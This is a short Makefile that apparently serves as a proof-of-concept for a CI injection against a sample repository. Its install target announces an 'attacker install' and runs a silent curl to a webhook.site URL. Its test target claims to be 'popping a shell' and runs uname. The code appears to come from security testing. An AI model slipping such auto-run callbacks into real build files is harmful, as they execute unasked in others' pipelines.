install:
	@echo "running attacker install"
	curl -sS https://webhook.site/TestActions/google-adk-samples/test2 ; \1

lint:
	@echo "do nothing"

test:
	@echo "popping a shell"; uname -a

backend:
	@echo "pretend to start a server"; sleep 1
